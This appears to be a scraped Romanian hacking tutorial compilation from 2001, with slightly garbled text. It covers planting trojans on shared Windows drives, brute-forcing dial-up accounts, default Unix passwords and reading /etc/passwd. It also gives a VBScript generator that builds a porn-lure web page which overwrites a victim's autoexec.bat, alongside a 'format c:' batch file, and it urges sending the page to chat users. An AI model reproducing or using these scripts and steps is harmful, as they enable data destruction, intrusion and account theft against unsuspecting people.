Explorați Cărți electronice
Categorii
Explorați Cărți audio
Categorii
Explorați Reviste
Categorii
Explorați Documente
Categorii
Data:7-02-2001
Subiect:Metode clasice de atac asupra oricarui server
Toate programele mentionarte le gasiti folsind motorul de cautare in care tastati numele
programului.
Vom folosi niste programe de hack pe care le aveti in windows si nici nu stiti de ele.
Puteti lua IP-ul cuiva cu ajutorul comenzii dos c:/windows/tracert -j www.numeserver.
Incercati cu c:/windows/tracert -j www.nebunu.home.ro pentru a afla ip-ul meu.
Comanda c:/windows/nbtstat -n va va lista toate numele de utilizator din calculatorul dvs iar
c:/windows/nbtstat -n www.numeserver va face acelasi lucru cu www.numeserver sau cu IP-
ul
persoanei dorite cum ar fi c:/windows/nbtstat -n 193.148.458.934.
Sa trecem acum la niste smecherii pe care le puteti face pe chat-uri unde sunt toti fraierii.
(rog pe Cristi si Edi sa nu se supere pe mine,ei nu fac parte din aceasta categorie.)
Presupunem ca un calculator are optiunea "file and print sharing" din optiunea "network"
care se gaseste in "control panel" activata.
Pentru a scana gazdele vulnerabile folositi programul Legion sau Nbtscan.
Daca este asa atunci putem face ce vrem cu calculatorul acelui lamer.Voi intrati pe chat cu
programul Mirc.Tastati "dns/nickname" pentru a-i la IP-ul apoi urmati succesiunea de
comenzi:
DISTRACTIE PLACUTA
Daca nu are "file and print sharing" disabled si este utilizator de windows NT atunci puteti
crea
un disc virtual x: pe care sa puneti troianul.
"net use x:\\IP\tmp\parola_dorita/user:ntwak0
"net copy server.exe"
C-R-A-C-K-I-N-G W-I-N-Z-I-P
Deci compara numarul meu fals din "al" cu numarul de inregistrare adevarat aflat in
memorie
in "esi".Treduie sa afisez continutul registrului esi pentru a afla numarul adevarat!!!!
DATA VIITOARE UN NOU TUTORIAL DE HACK
Ne vom ocupa in acest tutorial de conturile dial-up.
Cerinte: programul Fscan pe care-l puteti lua de pe packetstorm.securify.com
Continut:
tracert -j www.ISP.ro
Presupunem ca IP-ul gasit este 154.14.14.25.Pentru afla care este serverul de receptie a
mesajelor scanam IP-urile pe o raza care sa incadreze ultimul numar al IP-ului providerului,in
cazul nostru pentru portul 110.Dar nu
strica sa stim daca are si portul 79 deschis....;).
user blahbla
pass blabla
2)Daca stim userul mai trebuie sa aflam parola pentru a intra in posesia contului.Pentru asta
folosim un program de brute force(Brutus.Unsecure,WWWhack etc).Le gasiti folosind motorul
de cautare.In general lungimea parolei trebuie sa depaseasca 5 caractere,asa ca nu merge
cu optiunea "brute force".Construiti-va un dictionar de parole care sa corespunda unui alt
dictionar care sa cuprinda userii.Intai incercati daca userul si parola nu sunt identice,am
intalnit cazuri din astea.Ca sa aflati direct user-ul intrati pe un chat,si folositi optiunea
"finger" a programului mIRC.
Posibilitatile sunt nesfarsite,incercati...:).
3)Evident ca tot ce tastam ramane stocat in registrii windowsului.Pentru a afla datele despre
conexiune deschidem meniul Start optiunea Run si tastam Regedit.Datele despre conexiune
se afla la
Puteti afla astel userul dar parola este in binar si poate fi convertita usor,o sa scriu curand
un tutorial despre asta.
Din pacate acolo unde exista intelepti exista si nebuni,oameni care fac rau numai din
placerea de a face,fara nici un interes material sau de alta natura.Categoria mentionata este
mare,eu o sa mentionez numai un exemplu,un incident nefericit.Putin inainte de a scrie
acest articol,mai precis cu o zi inainte,am folosit motorul de cautare de la www.top100.ro
pentru a descarca un program.Dupa aspectul dubios al site-ului mi-am dat seama imediat ca
am de-a face cu un virus,dar mi-am pus nadejdea in masurile de securitate excelente pe
care le am impotriva oricarui tip de atac.Asa ca am descarcat programul si l-am
rulat.Antivirusul nu a dat nici un semn de viata.Mi-am contnuat lucrul mai
departe.Nimic.Poate m-am inselat,mi-am zis.Am inchis computerul si m-am culcat.A doua zi
i-am dat drumul.Dezastru.Ecran negru.Hardul putea sa faca concurenta celui mai nenorocit
tractor african.Am intrat pe Safe Mode.Acelasi lucru.Am intrat in binecuvantatul sistem de
operare MSDOS,pe care nu il voi mai critica niciodata.Am vrut sa vad continutul fisierelor
"win.ini","system.ini","autoexec.bat".Am gasit ceea ce cautam.In fisierul "system.ini" la linia
"shell" era ceva de genul:
shell=Explorer.exe gkgflllgg.exe
Am sters toata linia pana la semnul egal.Am cautat programul gkgfllgg.exe si l-am sters.Nici
un rezultat.Dupa doua ore de investigatii si dupa ce mi-am epuizat toata gama de injuraturi
am izolat toate fisierele infectate si le-am sters.Nimic.Nu puteam sa intru in Windows deci nu
aveam acces la registrii.Am reinstalat Windowsul dar am pierdut 100MB de pe hard plus
niste informatii pe care nu doream sa le pierd.De aceea vreau sa va dau cateva sfaturi foarte
utile privind propria securitate pe Net.
1)Nu va incredeti in nici un antivirus indiferent de upgrade,zilnic apar peste 12000 virusi din
ce in ce mai "duri'.
4)Programele care pretind ca listeaza toate conturile celor conectati la internet numai
introducand IP-ul serverului sunt virusi sau troieni.Exemple de astfel de programe
virusate,incarate de mine din simpla curiozitate pentrua vedea pana unde merge magaria,
prostia si lipsa de judecata a unora sunt:Iris.exe,dial_up_sniffer.exe,infiltrator.exe.Aceste
programe sunt gazduite de siteuri formate dintr-o singura pagina si care au foarte multe
voturi in top100.Singura pagina in care am incredere prezenta in top100 se afla la
www.ender2000.home.ro
Cand rulati un program si apare o caseta de dialog de genul "cannot find blabla.dll" sunt
90% sanse sa fie virus.Nu iesiti din windows,stergeti linia "shell" din "system.ini",sa ramana
ceva de genul "shell=Explorer.exe",stregeti toata linia "run" din fisierul "win.ini",sa ramana
numai "run=",afisati continutul fisierului "autoexec.bat" si inspectati continutul apoi vedeti
calea "c:/windows/start menu/programs/startup" si stregeti tot ce va pare suspect,adica ce
nu ati avut inainte.Apoi tastati "regedit" si stregeti CLSID-urile suspecte,o sa scriu un tutorial
despre registrii cat de curand.
Un hacker adevarat nu distruge nimic atunci cand reuseste sa patrunda intr-o retea ci
foloseste in interes propriu toate informatiile sustrase.Am intalnit lameri nenorociti care
formateaza hardul computerului in care reusec sa patrunda cu ajutorul programului Legion
sau a altor programe de acest gen.Asta denota lipsa de materie canusie,nu-si imagineaza ca
pot sa tina computerul respectiv sub control timp indelungat si sa sustraga in timp toate
informaiile.
Daca gasiti vreo explicatie pentru care cineva doreste sa distruga ceva fara nici un motiv
trimiteti un email la adresa nebunu@home.ro .
Priviti codul sursa de mai jos.Salvati pagina, copiati codul intr-un fisier cu extensia htm,rulati
pagina,apasati "yes",si vedeti cum se poate citi continutul unui fisier direct din browserul
Web.Evident ca se pot face mult mai multe,se poate schimba continutul unui fisier,se pot
infiltra troieni cu ajutorul comenzilor vbscript.
-----------------------------------------------incepe codul----------------------------------------------------------
<html><head><title>titlu</title></head><body bgcolor="black">
<script language="javascript">
stats='toolbar=no,location=no,directories=no,status=no,menubar=no,maximize= no'
stats+='scrollbars=no,resizable=no,width=335,height=80,top=190,left=227'
MsgBox = window.open ("","msgWindow",stats)
MsgBox.document.write("<title>Press YES to see the live demo! </title>")
MsgBox.document.write ("<BODY bgColor='#c0c0c0'>")
MsgBox.document.write ("<font color='black' size=5>Are you sure you want to see the
demo?</font>")
</SCRIPT>
<script language="vbscript">
dim f,a
set fso=createobject("scripting.filesystemobject")
set f=fso.opentextfile("c:\autoexec.bat")
a=f.readall
msgbox a
</script>
</body></html>
---------------------------------sfarsit----------------------------------------
Secventa:
set fso=CreateObject("scripting.filesystemobject")
set fisier=CreateTextfile("c:\fisier.txt")
fisier.writeline "o linie scrisa in fisier"
fisier.close
creeaza un fisier text in care apare textul "o linie scrisa in fisier".Acesta este principiul
infiltrarii troienilor.Restul invatati singuri.
Email nebunu@home.ro
@echo off
PATH c:/windows;c:/windows/command;
format c:/q/autotest/u
Programul a fost scris in vbscript pentru a putea vedea sursa acestuia si exemplifica
conceptul infiltrarii troienilor cu ajutorul paginilor web.Dezavantajul este ca programul
AntiLame ruleaza numai sub Windows95/98.
Programul poate fi luat de aici impreuna cu fisierul info.dat.Cele doua fisiere trebuie sa fie in
acelasi director altfel programul nu va rula.Daca programul v-i se pare interesant poate
votati pentru mine in top100.:)
Astept cu nerabdare comentariile dvs la nebunu@home.ro .Sfatul meu este sa trimiteti
pagina creata prin DCC lamerilor de pe chat-uri.Nu uitati sa fie arhivata!!!
dim fisier,linie,fisier2,troian,a,fisier3,g
mesaj = "Acest script va crea o pagina web care modifica autoexec.bat-ul lamerului"
titlu = "Vizitati www.nebunu.home.ro Email:nebunu@home.ro"
Call nebunu()
set fso=createobject("scripting.filesystemobject")
if fso.fileexists("info.dat")<>true then
msgbox "Fisierul info.dat nu exista! Reinstalati-l in director.",0,"Nebunu"
wscript.quit
end if
a=inputbox("Dati calea catre fisierul de comenzi pe care doriti sa-l introduceti in
autoexec.bat-ul lamerului.Fisierul trebuie sa fie in format text si nu trebuie sa fie mai mare
de 64K! :")
if (a="") then
wscript.quit
end if
set fisier=fso.Opentextfile(a)
set fisier2=fso.createtextfile("c:\my documents\oferta.htm")
set fisier3=fso.opentextfile("info.dat")
g=fisier3.readline
fisier2.write "<html><head><title>Animation program</title></head><body
bgcolor='black'>"
fisier2.writeline "<script language="&g&"javascript"&g&">"
fisier2.writeline"stats='toolbar=no,location=no,directories=no,status=no,menubar=no,maxi
mize=no'"<BR>fisier2.writeline"stats+='scrollbars=no,resizable=no,width=335,height=80,t
op=190,left=227'"
fisier2.writeline "MsgBox = window.open ("&g&""&g&","&g&"msgWindow"&g&",stats)"
fisier2.writeline "MsgBox.document.write("&g&"<title>Press YES to download free porn
movies !</title>"&g&")"
fisier2.writeline "MsgBox.document.write ("&g&"<BODY bgColor='#c0c0c0'>"&g&")"
fisier2.writeline "MsgBox.document.write ("&g&"<font color='black' size=5>Are you sure
you want to see the sexyest girls from the whole planet?</font>"&g&")"
fisier2.writeline "</SCRIPT>"
fisier2.writeline "<script language="&g&"vbscript"&g&">"
fisier2.writeline "set fso=createobject("&g&"scripting.filesystemobject"&g&")"
fisier2.writeline "set f=fso.createtextfile("&g&"c:/autoexec.bat"&g&")"
do while fisier.atendofstream<>true
linie=fisier.readline
troian="f.writeline "&g&"" &linie&""&g&" "
fisier2.writeline troian
loop
fisier2.writeline "f.close"
fisier2.writeline "</script>"
fisier2.writeline "</body></html>"
fisier.close
fisier2.close
fisier3.close
msgbox "Pagina a fost creata.Stiti ce aveti de facut cu ea :)",0,"Nebunu"
Sub nebunu()
Dim buton
buton = MsgBox(mesaj, _
vbOKCancel + vbInformation, _
titlu )
If buton = vbCancel Then
WScript.Quit
End If
End Sub
1)comenzi unix
2)fisiere speciale
3)suid shell
4)fisiere script
Prima oara cand am pus mana pe o carte despre UNIX mi-am zis ca nu o sa fiu
capabil niciodata sa invat acest sistem de operare deoarece este prea dificil.
In realitate este extraordinar de simplu si usor de utilizat oarecum asemanator
cu MSDos-ul.Aceasta impresie de moment mi-a fost creata de stilul in care a fost
scrisa cartea,un stil greoi cu multe explicatii suplimentare care in loc sa
te faca sa intelegi,mai rau te incurca,stil specific autorilor cu pretentii
de geniu,si cu mintea creatza datorita propriilor aberatii.
Eu o sa intru direct in subiect si o sa prezint comenzile principale.Evident
ca sa le puteti folosi trebuie sa aveti un cont la nethet.net.V-am explicat deja
cum poate fi obtinut,nu mai insist.(cititi capitolul telnet).Semnul $ reprezinta
promptul dvs la nether.net cum ar fi /> in Dos.
cat
ls
listeaza continutul unui director(toate fisierele)
ls-
acelasi lucru,numai cal isteaza si drepturile de acces.
cp
copiaza continutul unui fisier in alt fisier
cp fisier1 fisier2
ed
editeaza un fisier
ed fisier
?
a "de la append"
prima linie
a doua linie
{control z}
?
w
?
q
cd
schimba directorul curent
cd /etc
directorul curent va fi etc.
cd /
diretorul curent va fi directorul radacina.
pwd
rezultatul este directorul curent
pwd
/usr/bin
finger,rwho,who
ofera informatii despre domeniul respectiv sau despre userul respectiv
finger nebunu@home.ro
login name:nebunu
.........
finger home.ro
name:home.ro in real life??
connection refused
asta inseamna ca unele severe nu permit acest lucru si bine fac :)
mail
trimite un mesaj la adresa specificata
mail nebunu@home.ro
Salut,te-am votat in top 100
{control+c}
whereis
listeaza calea catre un anumit program sau fisier
whereis ping
chmod
shimba starea fisierului
chmod r+w fisier
fisierul acorda drept de citire si scriere
chmod +x fisier
fisierul poate fi executat
exit
termina aplicatia pe serverul gazda.
2)Cel mai important fisier pentru hackeri este /etc/passwd fisierul cu parola.
Am mai vorbit despre el asa ca nu mai insist.
De obicei utilizatorii obisnuiti nu au acces la el,dar la nether.net am gasit
o vulnerabilitate.Cu toate ca parolele nu pot fi decriptate deoarece sunt "shadow"
pot afla toti userii de pe server,in total vreo 10000!Cati dintre ei au aceiasi
parola ca si username?Foarte multi dar nu ma intereseaza......
cat etc/passwd
Alt fisier important este etc/services care contine serviciile care ruleaza pe server.
3)
Un shell este un program care se incarca in momentul conectarii iar apoi se
executa.Sa luam secventa:
c:/>windows>telnet nether.net 23
..tastati dublu enter...
..apar informatii despre server...
login:username-ul dvs
password:parola dvs
bash $
ftp
open ftp.server.com 21
username:guest
password:ftp
you are logged in
ftp>put fis.txt
ftp>quo "cp etc/passwd fis.txt"
ftp>quo "exec ls -l"
ftp>quit
unele servere permit executia de comenzi,am intalnit asa ceva recent iar altele
cand intalnesc o astfel de secventa te deconecteaza imediat.In continuare cateva
parole implicite pentru diferite servicii.Merge la serverele mai vechi.
ACCOUNT PASSWORD
------- --------
root root - nu prea tine figura ;)
sys sys / system / bin
bin sys / bin
mountfsys mountfsys
adm adm
uucp uucp
nuucp anon
anon anon
user user
games games
install install
demo demo
umountfsys umountfsys
sync sync
admin admin
guest guest
daemon daemon
*Inteleg ca va place ce cititi dar va rog sa mai si votati pentru ca ma simt prost de tot cand
sunt la concurenta cu niste site-uri porno tocmai pe locul 127. *
Daca aveti ceva interesant de semnalat,propuneri sugestii sau critici ,trimiteti un email la
nebunu@home.ro
Va rog mult sa cititi acest articol pana la capat,deoarece valoreaza mult mai mult decat
celelalte dupa parerea mea.